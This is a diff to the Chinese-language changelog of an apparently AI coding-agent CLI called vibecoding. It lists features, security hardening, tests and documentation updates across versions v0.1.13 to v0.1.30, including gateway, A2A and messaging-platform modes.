+  - 路径包含校验改为使用路径边界，而不是字符串前缀匹配
+  - 禁止 context `extraFiles` 逃逸工作目录
+  - 对 Hermes session 路径组件进行安全编码，并在创建 session 时强制校验 `allowed_work_dirs`
+  - 限制 session 删除只能删除配置 session 目录下的 `.jsonl` 文件
+
+- **认证、审批与资源限制**
+  - Hermes HTTP/WebSocket token 校验改为常量时间比较
+  - Hermes WebSocket 客户端改为通过 `Authorization: Bearer ...` 发送认证信息，不再放入 query string
+  - ACP 权限请求超时后清理 pending 状态，并向调用方传播写入错误
+  - 为 ACP、read 工具图片文件、微信响应和 cron A2A 响应增加大小限制
+  - 为 cron A2A HTTP 请求增加超时
+
+- **Memory、Context 与并发**
+  - 为 memory store 操作增加锁
+  - 修复 `memory.WriteAll()` 路径处理，并将 memory update/delete 限制在指定 section 内
+  - Gateway 在请求级 `temperature`/`top_p` 覆盖前克隆模型配置
+  - Agent callback 使用 context/message 快照，避免共享引用
+  - Cron job 状态变更通过 job store 串行化
+
+- **配置与 Gateway 加固**
+  - `!command` API key 解析现在必须显式设置 `VIBECODING_ALLOW_SHELL_CONFIG=1`
+  - 修复 Gateway CORS，使其只回显被允许的请求 origin
+  - Gateway 在非 loopback 监听、`yolo` 模式且未开启认证时输出启动警告
+  - 加固 platform home/shell fallback 行为
+
+### 🧪 测试
+
+- 增加 A2A 认证、task ID 唯一性、task 快照隔离和 working task message 持久化回归测试
+- 增加路径逃逸、危险 session ID、memory section 操作、ACP 清理、CORS、UTF-8 截断和 shell-config opt-in 测试
+- 已运行聚焦包测试，以及 A2A、agent、gateway、cron 的 race 测试
+
+### 📝 文档
+
+- 更新 A2A、Hermes、Gateway、配置和安全文档，说明新的认证和加固行为
+
+## v0.1.30
+
+### ✨ 新功能
+
+- **Provider 级 HTTP 代理**
+  - 新增 `providers.<name>.httpProxy`，支持为不同 provider 配置不同 HTTP 代理
+  - 未配置 `httpProxy` 时继续保留默认环境变量代理行为
+
+- **Google Gemini 和 Vertex 厂商适配器**
+  - 新增原生 `google-gemini` 和 `google-vertex` provider，使用 Google `streamGenerateContent`
+  - 支持 Gemini API 和 Vertex AI 原生 Gemini 端点的 baseUrl 自动识别
+  - 新增 Gemini API key 和 Vertex bearer token 的默认 Google provider 模板
+  - 更新 provider 文档与识别测试覆盖
+
+- **Hosted Web Search 工具**
+  - 为 CLI 和 ACP 运行新增 `--web-search`
+  - 新增顶层 `webSearch` 配置，包含 `enabled`、`provider`、`providerType` 和 `model`
+  - 仅在启用时注册 hosted `web_search`，并与本地 function tools 保持隔离
+  - 新增 OpenAI Responses API 映射到 `web_search`
+  - 将 Responses web search 映射改为 provider-neutral 的 `web_search`，兼容 provider 不必命名为 `openai`
+  - 新增 Anthropic Messages API 映射到 `web_search_20250305`
+  - 将 `webSearch.model` 保留为 provider-neutral metadata，用于后续路由和成本展示扩展
+
+- **默认 Provider 模板**
+  - 新增 OpenAI、Anthropic 和 Xiaomi MiMo 默认 provider 配置
+  - 保留 DeepSeek providers，并继续使用 `deepseek-openai` 作为默认 provider/model
+  - 首次生成的 `settings.json` 现在包含默认关闭的 web search 配置，以及 OpenAI/Anthropic/Xiaomi provider 模板
+
+### 🧪 测试
+
+- 增加 OpenAI Responses 和 Anthropic Messages hosted web search 序列化测试
+- 增加 web search 配置默认值、CLI flag 解析和 hosted tool metadata 传递测试
+- 增加 macOS 默认配置目录解析测试
+
+### 🐛 Bug 修复
+
+- **macOS 配置目录**
+  - 将 macOS 默认全局配置目录与 Linux 统一为 `~/.vibecoding`
+
+- **发布版本号**
+  - npm 和发行包版本检测默认不再附加 `dirty` 后缀
+  - 将 npm package metadata 规范化为 `0.1.30`
+
+## v0.1.29
+
+### 🐛 Bug 修复
+
+- **NPM 包装修复**
+  - 修复 `npm/bin/vibecoding` 入口脚本，确保安装包正确附带可执行包装器
+  - 调整 `build-npm.sh` 和 `build-npm-packages.sh` 保证包装器一致性
+
+## v0.1.28
+
+### ✨ 新功能
+
+- **Per-Model 温度/Top-P 配置**
+  - 为 `ModelConfig` 和 `Model` 新增 `temperature` 和 `top_p` 字段，支持逐模型参数调优
+  - 在 OpenAI 和 Anthropic 提供商中打通，使用 `omitempty` — `nil` 表示使用 API 默认值
+  - 在 provider factory、agent loop、ACP 模式中打通
+  - Gateway 模式支持请求级 `temperature`/`top_p` 覆盖（通过 `ChatParams`）
+  - 未配置时完全省略参数（不会向 API 发送零值）
+
+- **OpenAI Responses API 支持**
+  - 新增独立的 OpenAI Responses provider 路径，通过 `api: "openai-responses"` 启用
+  - 支持 Responses 流式输出、工具调用、reasoning summary 和 prompt cache 参数
+  - 在 provider `responses` 配置中暴露 Responses 专用设置，默认启用 prompt cache
+  - 新增模型兼容标志 `supportsPromptCacheKey` 和 `supportsReasoningSummary`
+
+### 🧪 测试
+
+- 提升 OpenAI Responses API 和 Anthropic 请求解析相关测试覆盖
+- 将 Anthropic 测试改为内存 HTTP mock，避免依赖本地端口监听
+
+### 📝 文档
+
+- 更新 `AGENTS.md` 版本至 v0.1.28
+
+## v0.1.27
+
+### ✨ 新功能
+
+- **Hermes 模式** (`vibecoding hermes`)
+  - 新增消息平台网关模式，支持微信、飞书和 WebSocket
+  - 持久化 per-user session，`/new` 时自动归档
+  - 默认 `yolo` 模式，适合无人值守场景
+  - 智能审批分级策略（low/medium/high 风险等级）
+  - 用户白名单访问控制
+  - WebSocket 流式推送：text_delta/think_delta/tool_call/tool_result/tool_diff/usage/done
+
+- **A2A 协议** (`vibecoding a2a`)
+  - 新增 Agent-to-Agent 协议服务器（JSON-RPC 2.0 over HTTP + SSE 流式）
+  - 独立模式：`vibecoding a2a start`（端口 8093）
+  - 集成模式：`hermes.json` 中 `a2a.enabled: true`，共享 hermes HTTP 端口
+  - Agent Card：`/.well-known/agent.json`
+  - Task 生命周期：submitted → working → completed/failed/canceled
+  - REST 端点：`/a2a/send`、`/a2a/task`、`/a2a/task/cancel`、`/a2a/events`
+  - **A2A Client**：`vibecoding a2a send <message>` 向其他 A2A Server 发送任务
+  - **A2A 发现**：`vibecoding a2a discover <url>` 获取远程 Agent Card
+  - **A2A 调度**：Cron 任务支持 `--a2a-target` 参数，定时向 A2A Server 发送任务
+
+- **A2A Master 模式** (`--enable-a2a-master`)
+  - 通过 `a2a-list.json` 配置多个远程 A2A Agent
+  - 注册 `a2a_dispatch` tool，LLM 可自动向远程 agent 分发任务
+  - 支持全局（`~/.vibecoding/a2a-list.json`）和项目级（`.vibe/a2a-list.json`）配置
+  - `--init-a2a-master-config` 生成示例配置文件
+  - 默认关闭，需显式启用
+
+- **A2A 配置初始化**
+  - `vibecoding a2a --init-a2a-config` 生成 `a2a.json` 配置模板
+  - `vibecoding --init-gateway` 生成 `gateway.json` 配置模板（已有）
+  - `vibecoding --init-a2a-master-config` 生成 `a2a-list.json` 配置模板
+  - 所有 `--init-*` 支持 `--force` 覆盖已存在的文件
+
+- **场景演示文档**
+  - 新增 `docs/scenarios.md`（中英文），覆盖 9 种实际使用场景
+  - 涵盖：日常编码、CI 集成、多 Agent、VS Code ACP、A2A 服务器、
+    A2A Master 跨机器调度、Gateway HTTP 网关、Hermes 消息平台、组合模式
+
+- **文档全面更新**
+  - `architecture.md`：补全全部模块（a2a/acp/gateway/hermes/mcp/memory/messaging/vendored）
+  - `tools.md`：新增 `a2a_dispatch` 和 `skill_ref` 工具文档
+  - `cli-reference.md`：新增 `--enable-a2a-master`、`--init-a2a-master-config`、
+    `--init-gateway`、`--force`、`a2a` 子命令文档
+  - `README.md`：架构图补全、新增运行模式总览
+
+- **压力系统**
+  - Context Pressure：55% context 使用率时触发 `EventContextPressure`（可通过 `context_pressure_threshold` 配置）
+  - Budget Pressure：剩余 20% 迭代时触发 `EventBudgetPressure`（可通过 `budget_pressure_threshold` 配置）
+  - 一次性触发：每个阈值越界只触发一次，非每轮触发
+  - 消息平台通过进度回调接收压力警告
+
+- **智能审批（分级策略）**
+  - low 风险：自动批准
+  - medium 风险：自动批准 + 通知用户
+  - high 风险（WebSocket）：发送 `approval_request`，等待用户 `approval_response`（5 分钟超时）
+  - high 风险（消息平台）：自动拒绝 + 通知用户
+  - 命令风险分类：基于 bash 命令模式的 low/medium/high 分级
+
+- **Provider/Model 配置**
+  - `hermes.json` 新增 `default_provider` / `default_model`（覆盖 `settings.json`）
+  - `hermes start` 新增 `-p`/`--provider` 和 `-m`/`--model` CLI 标志
+  - 优先级：CLI 标志 > `hermes.json` > `settings.json`
+
+- **多 Agent 模式** (`--multi-agent`)
+  - 启用子 Agent 工具（spawn/status/send/destroy）
+  - 通过 `hermes.json` 的 `multi_agent` 字段或 `--multi-agent` CLI 标志配置
+
+- **Sandbox 模式** (`--sandbox`)
+  - 可选 bwrap 沙箱隔离（默认关闭）
+  - 通过 `hermes.json` 的 `sandbox` 字段或 `--sandbox` CLI 标志配置
+
+- **MCP 工具继承**
+  - Hermes 自动加载全局/项目 `mcp.json` 中的 MCP 服务器
+  - MCP 工具按 session 注册，session 移除时自动关闭连接
+
+- **消息平台进度事件推送**
+  - agent 执行过程中实时向微信/飞书推送工具执行进度
+  - 格式：`[tool]: args ✅/❌`（工具）、`💭 ...`（思考过程）
+  - agent 完成后发送完整总结
+
+- **memory 工具**
+  - `memory` 工具支持 read/add/update/delete 操作
+  - section 级操作（User Profile、Working Memory、Lessons Learned）
+  - 默认写入 `.vibe/memory.md`（项目目录）
+  - 查找优先级：`memory.path` 配置 → `.vibe/memory.md` → `<GLOBAL_DIR>/memory.md`
+  - `/api/memory` HTTP 端点（GET/PUT）用于 memory 访问
+
+- **Hermes CLI 命令**
+  - `hermes start` — 启动守护进程（支持所有 CLI 标志）
+  - `hermes stop` — 通过 PID 文件 + SIGTERM 停止守护进程
+  - `hermes status` — 通过 PID + HTTP health 检查守护进程状态
+  - `hermes client` — WebSocket 客户端（流式输出 + 斜杠命令）
+  - `hermes config init/show` — 配置管理
+  - `hermes wechat login/status` — 微信 iLink 管理
+  - `hermes feishu setup/status` — 飞书配置
+  - `hermes webhook list` — webhook 路由查看
+  - `hermes memory show/clear` — memory 管理
+  - `hermes sessions list` — 活跃 session 列表（查询运行实例）
+  - `hermes cron list/add/remove/enable/disable` — 定时任务管理
+  - `a2a start/stop/status/card` — A2A 服务器管理
+
+### 📝 变更
+
+- 微信 iLink 协议实现，零外部依赖（5 个文件：types/protocol/auth/crypto/wechat）
+- 飞书 Bot 使用官方 SDK + WebSocket 长连接
+- Shell Hooks 支持 pre/post tool call 外部脚本（JSON stdin/stdout）
+- Webhook 入站路由，支持 HMAC-SHA256 签名验证
+- WebSocket 使用 `golang.org/x/net/websocket`（标准库兼容）
+- 基于 PID 文件的守护进程管理（hermes stop/status）
+
+### 🐛 问题修复
+
+- **NPM 安装包修复**
+  - 修复发布流水线，确保 `vibecoding-installer` 始终包含可执行入口 `bin/vibecoding`。
+  - 新增 `scripts/npm-installer-wrapper.js` 作为统一的 wrapper 逻辑源，并被 `scripts/build-npm.sh`
+    与 `scripts/build-npm-packages.sh` 复用，避免实现分叉。
+  - 调整 `npm/.npmignore` 与 `npm/bin` 的处理方式，避免误打包非发布文件，并通过 `files` 字段显式声明要发布内容。
+
+- **Hermes Webhook 投递与过滤**
+  - 当 webhook 路由无法识别事件类型时，除非显式允许 `*`，否则按不匹配处理。
+  - 为 webhook 路由新增 `delivery_target`，让微信/飞书投递拥有明确接收者。
+  - 路由列表和配置模板会在存在投递目标时一并展示。
+
+- **OpenAI Responses thinking 映射**
+  - 将 `--thinking xhigh` 在 OpenAI Responses API 中映射为 `reasoning.effort: "high"`。
+
+### 🧪 测试
+
+- 将 webhook router 测试改为等待 handler 完成，去掉 `time.Sleep` 带来的竞态和不稳定。
+- 增加无法推断事件类型时的 webhook 拒收测试。
+- 增加 webhook delivery target 相关测试覆盖。
+
+## v0.1.26
+
+### ✨ 新功能
+
+- **Gateway 模式** (`vibecoding gateway`)
+  - 新增 HTTP 服务，对外暴露标准 OpenAI Chat Completions API (`/v1/chat/completions`、`/v1/models`、`/health`)
+  - 任何兼容 OpenAI SDK 的客户端（Cursor、Continue、Open WebUI、Python SDK 等）可直接接入
+  - 完整支持 Streaming (SSE) 和 Non-streaming 响应
+  - 后端由 VibeCoding agent 循环驱动，tool 执行对调用方透明
+
+- **多 Session 支持**
+  - 内置 `SessionPool` 支持并发 session，每个 session 拥有独立的 agent、工具和消息历史
+  - 通过请求体中的 `x_session_id` 关联 session，未指定时自动创建
+  - 可配置空闲超时 (`session.idleTimeoutSeconds`) 和最大 session 数 (`session.maxSessions`)
+
+- **Gateway Sub-Agent 支持**
+  - 可选 `enableSubAgents` 配置，在 gateway 模式下启用多 Agent 编排
+  - 复用现有 `AgentFactory` / `AgentManager` / 子Agent 工具，无需改动核心 agent 逻辑
+
+- **Bearer Token 认证**
+  - 通过 `gateway.json` 的 `auth.enabled` 和 `auth.tokens` 列表配置
+  - 默认关闭；`/health` 端点始终不需认证
+
+- **API 指令系统 (Slash Commands)**
+  - `/clear`、`/mode`、`/model`、`/models`、`/sessions`、`/compact`、`/status`、`/skill`、`/skills`、`/help`
+  - 当最后一条用户消息以 `/` 开头时触发，在 gateway 层直接处理，不调用 LLM
+  - 响应使用标准 OpenAI 格式，附加 `x_command` 扩展字段
+
+- **Tool 可见性配置** (`toolVisibility.mode`)
+  - `"content"` (默认): streaming 时通过 `content` 字段发送 tool 状态文本
+  - `"sse_event"`: 通过扩展 SSE event 发送，适合自定义客户端
+  - `"none"`: 完全透明，客户端只见最终文本
+
+- **System Prompt 处理策略** (`systemPromptMode`)
+  - `"append"` (默认): 客户端 system message 追加到内置 system prompt 末尾
+  - `"ignore"`: 完全忽略客户端 system message
+
+- **安全: allowedWorkDirs 白名单**
+  - 请求级 `x_working_dir` 的目录白名单，支持路径分隔符感知的前缀匹配
+  - 三层安全模型: L1 认证 + L2 目录管控 + L3 沙箱 (bwrap)
+
+- **Gateway Sandbox 支持**
+  - 通过 `gateway.json` 的 `sandbox.enabled` / `sandbox.level` 或 `--sandbox` flag 配置
+  - 细节配置（allowedRead、deniedPaths 等）继承 `settings.json`
+
+- **Gateway 配置文件** (`gateway.json`)
+  - 独立配置文件，位于 `~/.vibecoding/gateway.json`
+  - 覆盖: 监听地址、认证、模式、沙箱、工作目录、目录白名单、session 管理、CORS、tool 可见性、system prompt 策略、请求超时、并发限制、日志
+  - `vibecoding --init-gateway` 生成配置模板；`--force` 强制覆盖
+
+- **请求超时与并发控制**
+  - `requestTimeoutSeconds` (默认 1800s)；streaming 有数据流动不超时
+  - `maxConcurrentRequests` (默认 0 = 不限制)
+
+### 📝 文档
+
+- 新增 `docs/gateway-proposal.md`，包含完整架构、API 设计、安全模型和实现计划
+- 更新 `AGENTS.md` 版本标注
+
+## v0.1.25
+
+### ✨ 新功能
+
+- **多 Agent 模式**
+  - 在 CLI、TUI、ACP 模式中新增可选的 `--multi-agent` 支持
+  - 新增 `AgentManager`、`EventRouter` 和每个 Agent 独立的 registry，隔离工具、job manager、session、messages 与 context
+  - 新增 `subagent_spawn`、`subagent_status`、`subagent_send`、`subagent_destroy` 工具，用于派生后台子任务
+  - 新增多 Agent system prompt 指引，并限制子 Agent 继续派生子 Agent
+
+- **Cron 定时任务**
+  - 新增 `internal/cron`，支持 cron store 持久化与调度器测试覆盖
+  - 在多 Agent TUI 工作流中新增 `/cron` 命令入口
+
+- **Provider 厂商适配层**
+  - 新增 `internal/provider/vendor*.go` 厂商适配注册机制
+  - 将 provider/model 创建逻辑统一到 `internal/provider/factory`
+  - 新增 DeepSeek、Xiaomi、Kimi、MiniMax、Seed、Qianfan、Bailian、Gitee、OpenRouter、Together、Groq、Fireworks、OpenAI、Anthropic 等厂商识别
+  - 保持现有 provider 配置格式不变，同时支持厂商默认值和通用 OpenAI/Anthropic 兼容 fallback
+  - 新增模型 `compat` 处理，覆盖 thinking 格式、reasoning effort、max token 字段、自适应 Anthropic thinking，以及 DeepSeek/Xiaomi assistant `reasoning_content`
+
+### 🐛 问题修复
+
+- session 首次 append 时自动初始化，避免子 Agent 写入 session 前必须显式初始化
+- 修复子 Agent 测试中的后台运行清理顺序，确保临时目录删除前已等待并销毁派生 Agent
+- 在 provider 创建逻辑迁移到共享 factory 后，保留 ACP Anthropic cache-control 行为
+
+### 📝 文档
+
+- 更新 `AGENTS.md`，补充 provider factory 与 vendor adapter 工作约定
+- 将多 Agent 实施 checklist 更新为已落地架构/状态说明
+- 删除已过时的根目录 `todo.md`
+
+### 🧪 测试
+
+- 新增 provider vendor 解析、provider factory 创建、OpenAI/Anthropic compat、多 Agent manager/router/sub-agent 流程、cron 存储/调度、session 自动初始化等测试覆盖
+- 已通过 `make test`（`go test -v -race ./...`）
+
+---
+
+## v0.1.24
+
+### ✨ 新功能
+
+- **API 重试与指数退避**
+  - 对暂时性错误（5xx、网络故障、速率限制）在初始 HTTP 连接阶段自动重试
+  - 指数退避策略：`baseDelay × 2^attempt`，上限 30 秒
+  - 不会重试：用户中止（`context.Canceled`）、4xx 客户端错误、流传输中途失败
+  - 通过 `retry` 配置项（`maxRetries`、`baseDelay`、`maxDelay`）灵活调整
+  - Agent 将重试事件作为状态更新透出到 TUI 和 print 模式
+  - ACP 模式同样接收重试配置
+
+### 🐛 问题修复
+
+- **Anthropic `cache_control` 改为显式启用**
+  - 默认关闭 `cache_control`（此前会根据官方 API base URL 自动启用）
+  - 需在 provider 配置中显式设置 `cacheControl: true` 才能启用 prompt 缓存
+  - ACP provider 创建时显式为 Anthropic 启用 `cache_control`
+
+- **Anthropic Tool Result 分组**
+  - 修复连续 `toolResult` 消息未合并为单条 `user` 消息的问题
+  - Anthropic API 要求前一轮 `tool_use` 对应的所有 `tool_result` 块在后续内容之前集中出现
+  - 工具结果中的图片块现在会在同一消息中追加到所有结果块之后
+  
+- **Agent 纯工具循环告警顺序**
+  - 将无文本输出的工具循环告警改为在 tool result 追加之后再注入
+  - 保持 assistant -> toolResult -> warning 的消息顺序，确保 provider 与 session transcript 都合法
+  - 告警消息现在也会持久化写入 session 存储
+
+### 📝 文档
+
+- **配置文档全面重写**
+  - 补充缺失配置项：`cacheControl`、空闲压缩、完整沙箱字段（`bwrapPath`、`allowedRead`、`allowedWrite`、`deniedPaths`、`passEnv`、`tmpSize`）、`shellPath`、`shellCommandPrefix`、`sessionDir`、`skillsDir`、`theme`、`retry`
+  - 记录 shell 命令格式的 `apiKey`（`!cmd`），支持密码管理器集成
+  - 修正密钥解析顺序：优先使用配置中的 `apiKey`，其次使用推导的环境变量
+  - 更新 macOS 配置路径文档
+  - 新增顶层字段参考表及所有默认值
+  - 新增各平台沙箱路径与环境变量默认值
+  - 改进示例：Claude provider `cacheControl`、空闲压缩、项目级覆盖、自定义沙箱路径
+
+### 🧪 测试
+
+- 新增重试测试，覆盖 `IsRetryable`、`RetryDelay` 和 `FormatRetryMessage`
+- 新增 Anthropic provider 测试，覆盖连续 tool result 分组
+- 新增回归测试，覆盖 tool result 之后的纯工具循环告警插入位置
+
+---
+
+## v0.1.23
+
+### 🛠 改进
+
+- **DeepSeek Thinking 格式**
+  - 新增 `thinkingFormat: "deepseek"`，用于 DeepSeek 推理请求
+  - OpenAI 兼容请求现在会发送 `thinking: {type: "enabled"}` 和 `reasoning_effort`
+  - Anthropic 兼容请求现在会发送 `thinking: {type: "enabled"}` 和 `output_config.effort`
+  - 保留 `thinkingFormat: "xiaomi"` 作为旧的 thinking-only 格式
+
+### 🧪 测试
+
+- 新增 provider 测试，覆盖 OpenAI 与 Anthropic 兼容请求下的 `deepseek` thinking 格式
+
+### 📝 文档
+
+- 更新 `anthropic-api` skill 与配置文档中关于 `thinkingFormat` 选项的说明
+
+---
+
+## v0.1.22
+
+### ✨ 新功能
+
+- **CLI/TUI MCP 自动加载**
+  - CLI/TUI 启动时现在会加载全局与项目 `mcp.json`，连接已配置的 MCP 服务器，并在 agent 工具列表冻结前注册 MCP 工具
+
+### 🐛 问题修复
+
+- **Markdown 渲染样式**
+  - 将 CLI print 模式和 TUI 的 Markdown 渲染从 Glamour 自动样式检测改为固定 `dark` 样式，提升不同终端中的显示一致性
+
+### 🧪 测试
+
+- 新增 MCP 配置加载测试，覆盖模板占位服务器过滤
+
+### 🛠 改进
+
+- **共享 MCP 运行时**
+  - 将 MCP 连接与工具注册从 ACP 私有实现提取为共享运行时，ACP 与普通 CLI/TUI 会话复用同一套逻辑
+  - 自动启动加载时会忽略 starter 模板中的占位 MCP 服务器
+
+---
+
+## v0.1.21
+
+### ✨ 新功能
+
+- **Plan/Apply 工作流**
+  - 新增内置 `plan` 工具，用结构化任务计划表达 `pending`、`running`、`done` 和 `failed` 步骤状态
+  - TUI 现在会展示当前任务计划，并把计划更新记录到对话历史中
+  - Print 模式和 ACP 现在也会透出计划更新，支持非交互和编辑器客户端流程
+
+- **Apply 确认**
+  - 新增 `approval.confirmBeforeWrite`，用于在 Agent 模式下要求 `write` 和 `edit` 执行前审批
+  - 新生成的默认配置会启用写入/编辑确认
+  - TUI 审批提示会用字节数摘要写入内容，避免直接展示完整文件内容
+
+- **MCP 配置命令**
+  - 新增 `/init_mcp`，支持创建项目/全局 `mcp.json`，并提供 `basic`/`full` 模板及 `--force` 覆盖
+  - 新增 `/mcps`，用于列出全局与项目 `mcp.json` 中的 MCP 服务器
+  - MCP 配置改为独立 `mcp.json`（不与 `settings.json` 混用）
+
+### 🧪 测试
+
+- 新增 `plan` 工具和 write/edit 审批门控测试覆盖
+- 新增基于 HTTP 的 MCP 集成测试，覆盖 tool/resource/prompt 注册与回调链路
+- 新增基于 SSE 的 MCP 集成测试，覆盖流通知回调与 message endpoint 请求/响应链路
+
+### 🛠 改进
+
+- **ACP MCP 健壮性增强**
+  - 新增 `http` 和 `sse` MCP 传输支持（保留现有 `stdio`）
+  - 为 MCP 初始化与工具发现增加超时控制，避免 ACP 会话长时间挂起
+  - 为 `tools/list` 增加分页拉取与页数上限保护
+  - 新增 MCP `resources/*` 与 `prompts/*` 发现和工具注册
+  - 增加 MCP 服务器重名检测与 MCP 工具名去重注册
+  - 增加 MCP 入站请求/通知处理（`ping`、progress/logging/cancel 通知）
+  - 新增入站 `sampling/createMessage` 到当前 ACP provider/model 的桥接
+  - 收紧关闭/错误传播行为
+
+---
+
+## v0.1.20
+
+### ✨ 新功能
+
+- **结构化文件变更报告**
+  - `write` 和 `edit` 现在会在工具结果中附带结构化文件 diff 元数据
+  - TUI 工具详情中展示完整 unified diff，折叠工具行保留简洁的 `+N -N` 摘要
+  - Print 模式现在会为非交互运行输出清晰的文件变更摘要
+  - ACP 工具更新会在 raw output 中包含 diff 元数据，方便兼容客户端使用
+
+### 🧪 测试
+
+- 新增 `write` 和 `edit` 结构化 diff 元数据测试覆盖
+
+---
+
+## v0.1.19
+
+### ✨ 新功能
+
+- **TUI 工具详情 Modal**
+  - 将 `Ctrl+O` 切换展开替换为可滚动的全屏 modal overlay，展示所有工具调用及结果
+  - 支持 PgUp/PgDn、Up/Down、Home/End 导航；Esc/Ctrl+O/q 关闭
+  - 工具标题现在显示文件路径；移除了工具参数中的内容截断
+  - Write 工具结果在摘要行显示 diff 信息
+  - Modal 打开时屏蔽键盘输入，防止误操作
+
+- **Write 工具 Diff 摘要**
+  - `write` 工具现在在覆盖文件时基于 LCS 算法计算行级 diff
+  - 在工具结果中返回结构化 diff 信息（`+N -N` 及行范围）
+  - 对超大文件（>20 万行对）跳过 diff 计算，避免内存压力
+
+### 🛠 改进
+
+- **沙箱后端统一 Shell 参数**
+  - 所有沙箱后端（`none`、`mac`、`windows`）现在统一使用 `platform.ShellArgs()` 构造 cmd.exe/PowerShell 参数
+  - 修复沙箱模式下 Windows cmd.exe 和 PowerShell 命令执行问题
+  - `ShellArgs` 现在在匹配前将 shell 名称转为小写
+
+### 🧪 测试
+
+- 新增 `TestNoneSandboxWrapCommandUsesPlatformShellArgs`，覆盖 cmd.exe 和 PowerShell 参数生成
+
+---
+
+## v0.1.18
+
+### 🐛 问题修复
+
+- **TUI Nil 指针 panic**
+  - 修复 `printMessageOnce` 在 `printedMessageIdx` map 未初始化时导致的 nil 指针 panic
+  - 添加 nil 检查，确保在消息打印逻辑中安全访问 map
+
+- **工具执行前提交流**
+  - 添加 `commitActiveStream()` 方法，用于在工具执行前将流式内容（thinking 和 assistant 消息）刷新到输出
+  - 现在在 `EventToolCall` 和 `EventToolApprovalRequest` 处理前正确提交活跃的流
+  - 确保在工具运行或请求审批时能看到 thinking 和部分 assistant 响应
+
+### 🧪 测试
+
+- 新增 `TestHandleAgentEventCommitsStreamBeforeApproval` 回归测试，覆盖流提交顺序
+
+---
+
+## v0.1.17
+
+### 🛠 改进
+
+- **TUI 原生滚动历史**
+  - 重构 TUI 历史渲染：已完成消息会输出到终端原生 scrollback，而不是固定高度 viewport
+  - 移除虚拟滚动条与鼠标捕获方案，鼠标滚轮现在使用终端自身的历史滚动行为
+  - 保留实时流式内容、输入框、footer、上下文/缓存状态以及工具输出控制
+
+- **TUI 请求计时器**
+  - 响应运行期间显示本次请求耗时
+  - 请求完成后在 footer 保留上一次请求耗时
+
+- **事件循环解耦**
+  - 新增共享的 agent event 消费辅助逻辑
+  - 将 TUI 的 agent event bridge 从主 app 文件拆出，并让 CLI print 模式复用同一套事件消费逻辑
+
+- **Windows 控制台兼容性**
+  - 在可用时启用 Windows Virtual Terminal 控制台模式，改善 Windows 10 PowerShell 下的显示兼容性
+
+### 🐛 问题修复
+
+- 修复 TUI 启动时在 Bubble Tea 开始消费消息前打印初始/会话历史导致的卡死问题
+- 修复 `go test -race` 发现的 agent 消息历史数据竞争
+- 修复 mock provider 在 context 已取消时未稳定返回取消错误的问题
+
+### 🧪 测试
+
+- 全量 `make test` 已通过 race detection
+- 新增 TUI 启动历史打印不阻塞的回归测试
+- 增强受限环境下依赖本地 HTTP listener 或默认 home 目录会话路径的测试稳定性
+
+---
+
+## v0.1.16
+
+### 🛠 改进
+
+- **通过 ID 或路径打开会话**
+  - 新增 `OpenByPathOrID` 函数，支持通过文件路径或会话 ID 打开会话
+  - `OpenByID` 现在支持前缀匹配，并具备歧义检测
+  - `ContinueRecent` 在创建新会话时立即初始化，确保可直接写入消息
+
+- **会话保存错误处理**
+  - `AppendMessage` 和 `AppendCompaction` 现在会向调用方返回错误
+  - Agent 循环将会话保存失败作为 `EventError` 上报，不再静默丢弃
+
+- **内嵌工具测试守卫**
+  - Makefile `test` 目标现在依赖 `prepare-vendored` 和新增的 `test-vendored` 检查
+  - 若当前平台缺少 `rg`/`fd` 二进制文件，测试会提前失败并给出明确提示
+
+### 🧪 测试
+
+- 新增 CLI flag 解析测试，覆盖 root 和 ACP 子命令
+- 新增配置合并测试，覆盖项目级覆盖和环境变量
+- 新增会话测试，覆盖 `OpenByPathOrID`、前缀歧义、损坏行和父链追踪
+
+---
+
+## v0.1.15
+
+### 🐛 问题修复
+
+- **内嵌搜索工具可用性**
+  - 修复 `grep` 和 `find`：当内嵌的 `rg` / `fd` 尚未释放到本地时，会按需准备二进制文件，而不是直接失败
+  - 为已释放的内嵌二进制补齐可执行权限，避免复用时出现 `permission denied` 错误
+
+- **Bash 工具结果处理**
+  - 修复 bash 工具返回内容，稳定输出 stdout、stderr、工作目录和退出码等结构化信息
+  - 将命令非零退出保留为正常工具结果，并通过明确的 `exit_code` 字段表达，而不是混入传输级错误
+  - 统一将空 stdout/stderr 渲染为 `(no output)`，便于下游稳定处理
+
+---
+
+## v0.1.14
+
+### 🐛 问题修复
+
+- **继续会话上下文注入（`-c`）**
+  - 修复 TUI 状态耦合问题：继续会话时可能只显示历史记录，但后续提问未将历史真正注入模型上下文
+  - 将会话历史状态拆分为“UI 展示标记”和“Agent 注入标记”，确保恢复会话后可持续携带上下文
+  - 在 agent 重建场景（中止/模式切换/模型切换/技能切换/会话切换）统一重置历史注入状态
+  - 补充 `EventStatus` 与 `EventMessageStart` 的 TUI 事件处理，确保状态/警告消息稳定渲染
+
+### 🧪 测试
+
+- 新增回归测试覆盖：
+  - UI 历史已加载时的历史注入
+  - 继续会话真实启动时序（`Init()` 先加载历史，再处理后续输入）
+
+---
+
+## v0.1.13
+
+### 🐛 问题修复
+
+- **流式事件与工具调用健壮性**
+  - 保留 TUI 事件监听器中的 agent 事件，避免流式过程中丢失 done/error/status 处理
+  - 为 Anthropic 增加 thinking signature 的流式接收与多轮回放支持，并将 SSE `error` 事件正确上报为流错误
+  - 当 OpenAI 兼容 provider 在流式工具调用中省略 ID 时，自动生成回退 ID，并在 agent 循环中增加额外防御性回退
+
+- **沙箱环境继承**
+  - 修复 `none` 沙箱执行未继承父进程环境的问题，包括 `$HOME` 等环境变量
+  - 明确 bubblewrap 环境变量覆盖逻辑，使实现与实际运行行为一致
+
+### 🛠 改进
+
+- **内嵌工具构建流程**
+  - 围绕 `prepare-vendored` 统一构建与发包流程
+  - 移除旧的 `vendored-tools` 发布步骤，并废弃过时的提取辅助脚本
+
+- **文档站点布局**
+  - 扩大文档首页内容区宽度，提升大屏阅读体验
+
+- **包元数据**
+  - 更新 npm 安装器相关包版本
+
+### 📖 文档
+
+- 更新 README 与文档首页，突出更安全的审批处理、统一缓存指标和一致的 provider 调试行为
+- 精简仓库内 agent 使用说明 `AGENTS.md`
+
+### 🧪 测试
+
+- 为 bash 工具补充仅 stdout、仅 stderr、无输出、非零退出码等输出场景覆盖
+- 为 TUI 增加状态/警告渲染与 done/error 事件透传的回归测试
+- 为缺失 ID 的 OpenAI 流式工具调用增加回归测试
+
+---
+
 ## v0.1.12
 
 ### 🐛 问题修复
@@ -529,4 +1283,4 @@
 
 ---
 
-**完整变更日志**: https://github.com/startvibecoding/vibecoding/compare/v0.0.1...v0.0.7
